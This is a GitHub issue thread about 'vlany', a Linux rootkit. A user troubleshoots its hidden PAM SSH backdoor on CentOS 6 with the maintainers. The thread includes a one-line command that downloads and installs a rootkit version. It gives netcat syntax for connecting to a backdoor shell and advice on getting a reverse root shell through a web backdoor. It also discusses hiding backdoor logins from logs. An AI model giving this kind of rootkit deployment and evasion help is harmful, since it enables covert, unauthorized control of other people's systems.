Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Unable to authentificate using the PAM backdoor on CentOS 6.x #13

Open
bogdanstoica35 opened this issue Jan 13, 2017 · 29 comments
Open

Comments

@bogdanstoica35
Copy link

I have succesfully installed vlany on a clean centos box (a kvm vps), centos 6.8 x64 distro with the latest updates (the minimal install). Nothing else is running on that vps since is was specifically created to test your rootkit.

I am using sh ssh.sh username localhost port (it connects to the sshd daemon to the backdoor ssh port specified during rootkit install). But the user/pass combination always fails.

Any help would be really appreciated!

Keep developing this really nice rootkit!

@unixfox
Copy link
Collaborator

unixfox commented Jan 13, 2017

Already reported here: #5 (comment)

@mempodippy
Copy link
Owner

mempodippy commented Jan 13, 2017

Apologies. Will look at version changes more in-depth tomorrow. Only went on small assumptions. :/
unixfox, the issue still stands... I do have a solution to fix the problem, but there is a better solution than an easy fix which I would rather choose over the prior option. I'll see what happens...
Will resolve this small mistake on my behalf tomorrow.

@bogdanstoica35
Copy link
Author

Thank you. Is there other method to remotely connect to a server where the rk was installed except for the ssh? I mean like connectin from my linux box to the server? Also when using the ssh backdoor port are there any logs saved?

@bogdanstoica35
Copy link
Author

Btw until the ssh/pam backdoor is fixed, how can I connect to the the sever where the rk was installed using netcat supposing low port is 10000 and high port is 10004 (that was configured during rk install)

Thanks again!

@bogdanstoica35
Copy link
Author

Not sure if you have changed anything in the rootkit but know the error changed (I have used the latest version from github a new fresh centos 6 vps minimal install)

root@pve1:/opt# ./ssh.sh bogdan 172.16.100.50 8197
Connecting to PAM backdoor @ host 172.16.100.50 on hidden PAM port 8197 as sweed29
Press enter to continue
sweed29@172.16.100.50's password:
sweed29@172.16.100.50's password:
Failed to connect. bind probably still alive - wait a minute and try again.

I thought is good to share this information with you.

PS: How do I connect using netcat to get a shell?

@mempodippy
Copy link
Owner

mempodippy commented Jan 14, 2017

The bug might actually be fixed. I ran into this bug a couple of times using ssh.sh to connect, but could connect without it, suggesting ssh.sh is the perpetrator in this situation.. I'd always fix it locally and forget to update it on the repo. Pull the latest commit and try again.

If you can install a web server (shouldn't be done in a real situation if there's not already one installed) and use the snodew backdoor, it will give you a reverse root shell assuming suid bins aren't disabled on the box. The accept backdoor doesn't work in most situations. Since the accept backdoor is somewhat deprecated, I'd like to only work on the accept backdoor if it's absolutely vital - but in time I probably will make updates and improvements to it.
nc -p [source_port] [host] [service port]
Of course, add the --ssl flag if you installed the backdoor to go through SSL.

Edit: I'm working on my own local version, and I'm making significant changes to it. Said changes are mostly optimisation, couple of changes to hooks and functions, may just resolve and improve the accept backdoor while I'm doing that.

@bogdanstoica35
Copy link
Author

root@pve1:/opt# sh ssh.sh sweed29 172.16.100.51 8197
Connecting to PAM backdoor @ host 172.16.100.51 on hidden PAM port 8197 as sweed29
Press enter to continuessh.sh: 15: read: arg count
root@pve1:/opt# sweed29@172.16.100.51's password:
Permission denied, please try again.
sweed29@172.16.100.51's password:
Permission denied, please try again.
sweed29@172.16.100.51's password:
Permission denied (publickey,gssapi-keyex,gssapi-with-mic,password).

For some reason now it tries to login using the private key. I have checked and I have no private key generated for that user on my local box and user sweed29 does not actually exist on the remote box (where to rootkit is installed).

I have managed to connect using the nc -p 10000 host 22 (there is no web server installed) but that shell seems to be limited to just a few commands. So I really think that a working ssh backdoor is the way to go.

Thank you for all your efforts. Maybe I am not doing something right but it's still not working.

I have spinned a new clean centos 6.8 minimal install vm and got the source from git, and installed (I have destroyed the previous vm).

@unixfox
Copy link
Collaborator

unixfox commented Jan 14, 2017

@bogdanstoica35 It isn't trying to authenticate using private key, the listing at the end (Permission denied (publickey,gssapi-keyex,gssapi-with-mic,password)) is just the authentications methods available for your openssh server.

@mempodippy Did you tried to install vlany on CentOS 5.11 because it doesn't want to install because of this error:

Traceback (most recent call last):
  File "config.py", line 11, in ?
    print "Usage: {0} <install> <lib name> <xattr 1> <xattr 2> <username> <plaintext password> <pam port> <ssl backdoor status> <accept shell password> <low> <high> <execve password> <environ var> <ptrace bug status>".format(sys.argv[0])
AttributeError: 'str' object has no attribute 'format'
Configuration failed. Exiting.

I think it's because the python version of CentOS 5 is a bit old (Python 2.4.3 (#1, Jan 9 2013, 06:47:03)) and str.format is available since python 2.6 (http://stackoverflow.com/a/792745/4297304).

@mempodippy
Copy link
Owner

That's annoying... Will update a fix to that problem soon.

@unixfox
Copy link
Collaborator

unixfox commented Jan 14, 2017

@mempodippy I fixed the issue (#14), I'm currently testing if vlany is working fine on CentOS 5.11.

@unixfox
Copy link
Collaborator

unixfox commented Jan 14, 2017

It fails on Configuration failed. Exiting. without additional errors, really strange... I think it get stuck with the config.py program.
PS: I'm using the config.py with my fix.

@mempodippy
Copy link
Owner

mempodippy commented Jan 14, 2017

config.py uses str.format very frequently, especially when setting up const.h.
It'll take about 5-10 minutes to replace the uses of str.format with the older compatible method of formatting strings, it just looks nasty lol..
unixfox, give me a second, check email. 😄

@unixfox
Copy link
Collaborator

unixfox commented Jan 14, 2017

@mempodippy There are so many lol, I'll try convert them tomorrow (it's 1am UTC+1 for me) because it fails too with a quick try (5a7d300).

@mempodippy
Copy link
Owner

Appreciated, and it's quite late here too. Will be up later so I'll probably catch up on small changes and work on my local version a bit.

@bogdanstoica35
Copy link
Author

Yeah well, in the end it is still not working on centos 6. Can authenticate via the ssh backdoor! I will try on a fresh centos installed, re-install vlany and see if it works or not. I'll keep you posted!

@bogdanstoica35
Copy link
Author

bogdanstoica35 commented Jan 15, 2017

After a new fresh install, this is the result:

root@pve1:/opt# ./ssh.sh sweed29 172.16.100.54 65534
Connecting to PAM backdoor @ host 172.16.100.54 on hidden PAM port 65534 as sweed29
Press enter to continue
sweed29@172.16.100.54's password:
Failed to connect. bind probably still alive - wait a minute and try again.
root@pve1:/opt#

The previous errors are gone. Am I doing something wrong?!

PS: Is it an issue that the centos vm is an lxc container in fact? I can spin a kvm vm if necessary...

@bogdanstoica35
Copy link
Author

bogdanstoica35 commented Jan 15, 2017

On the vm where the rootkit is installed:

Jan 15 04:40:54 centos sshd[1226]: Server listening on 0.0.0.0 port 22.
Jan 15 04:42:51 centos sshd[1226]: error: accept: Software caused connection abort
Jan 15 04:42:54 centos sshd[1237]: error: fcntl(5, F_GETFL, 0): Bad file descriptor
Jan 15 04:43:38 centos sshd[1226]: error: accept: Software caused connection abort
Jan 15 04:43:39 centos sshd[1242]: error: fcntl(6, F_GETFL, 0): Bad file descriptor
Jan 15 04:44:45 centos sshd[1246]: Invalid user sweed29 from 172.16.100.1
Jan 15 04:44:45 centos sshd[1247]: input_userauth_request: invalid user sweed29
Jan 15 04:44:48 centos sshd[1246]: pam_unix(sshd:auth): check pass; user unknown
Jan 15 04:44:48 centos sshd[1246]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=172.16.100.1
Jan 15 04:44:50 centos sshd[1246]: Failed password for invalid user sweed29 from 172.16.100.1 port 65534 ssh2
Jan 15 04:44:53 centos sshd[1246]: pam_unix(sshd:auth): check pass; user unknown
Jan 15 04:44:55 centos sshd[1246]: Failed password for invalid user sweed29 from 172.16.100.1 port 65534 ssh2

On the server where ssh.sh is and after waiting for about 2-3 minutes

root@pve1:/opt# ./ssh.sh sweed29 172.16.100.54 65534
Connecting to PAM backdoor @ host 172.16.100.54 on hidden PAM port 65534 as sweed29
Press enter to continue
sweed29@172.16.100.54's password:
sweed29@172.16.100.54's password:
sweed29@172.16.100.54's password:
Failed to connect. bind probably still alive - wait a minute and try again.

Wasn't it supposed to hide the connections on the backdoor? Like not showing the login in the logs?!

@unixfox
Copy link
Collaborator

unixfox commented Jan 15, 2017

The failed connections are logged because it's by default in the openssh server. Only successful connections are hidden from the logs.
I'll try on a fresh CentOS 6 (KVM) install if I can reproduce the bug.

EDIT: There is a bug at the install, it's caused by my commit (#14), you can temporally use a old version of vlany (this was in WIP work in progress but @mempodippy merged the commits) :

wget https://github.com/mempodippy/vlany/archive/6a3cf1c592d70a63d82a3c54baf81c11dd6f1e6c.zip -O vlany.zip && unzip vlany.zip && cd vlany-6a3cf1c592d70a63d82a3c54baf81c11dd6f1e6c && ./install.sh

EDIT²: I can reproduce the bug reported by @bogdanstoica35.

@unixfox unixfox changed the title failed to authenticat use the PAM backdoor username and password on a CentOS 6.8 x64 Unable to authentificate using the PAM backdoor on CentOS 6.x Jan 15, 2017
@bogdanstoica35
Copy link
Author

So it is not related to a lxc container, the behavior is the same on both lxc vm snd kvm vm

@bogdanstoica35
Copy link
Author

Any updates on this?!

@unixfox
Copy link
Collaborator

unixfox commented Jan 18, 2017

I'll resolve my issue when I'll have some time because currently I'm busy.
For the PAM backdoor bug, @mempodippy will take a look at it when he'll have free time I think.

@mempodippy
Copy link
Owner

mempodippy commented Jan 19, 2017

Sorry, I've been very busy. In the next few days or so I'm going to push a significant update.
While doing so I'll attempt to fix the PAM backdoor bug. If a fix isn't pushed in the same commit, then it'll be pushed after. Apologies.
Edit: Expect a push whenever. Been busy the past couple of weeks with some school stuff... It'll only get worse too.

@bogdanstoica35
Copy link
Author

I am still unable to login via ssh using the backdoor username. I can login with a real regular user or root account though. Is there anyway that the connections to ssh using the backdoor port to be not logged at all? I mean the way I see it, that's the purpose of a rootkit right? To be able to connect to a server without anyone being able to see you connected or any trace to appear in the server's logs...

@unixfox
Copy link
Collaborator

unixfox commented Jan 30, 2017

@mempodippy didn't pushed since a long time so that's normal that the bug isn't resolved.
And for hiding failed attempts to the backdoor it's possible by removing all logs from the special user used for ssh but this isn't really useful because if the login is successful the log will be already removed.
PS: I just wanted to remind you that vlany is I think a research project & in active development and not fully designed to be installed on a compromised critical machine.

@mempodippy
Copy link
Owner

There's a disclaimer in the README. Refer to that.

@bogdanstoica35
Copy link
Author

I am pretty aware about what vlany is and I have also had read the Readme file. I thought that testing or suggesting features or any other stuff like this would be helpfull for the improvement or the development of vlany. Nothing else!

@mempodippy
Copy link
Owner

It is helpful, thank you. I just need to make myself some time.

@bogdanstoica35
Copy link
Author

Any news?

@mempodippy
Copy link
Owner

I'm moving, will have more time after that.
However my current local version has new function additions & optimization, owner shell tweaking, some changes to the library constructor & destructor, changes to hooks & config, and some other minor things. But... is very unstable. Everything has been thrown in without compiling the new changes, so once I'm satisfied with all the changes, I'll see what needs fixed.
Would rather keep this slightly managed version of vlany on the repository.
I will push an update soon. Sorry.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants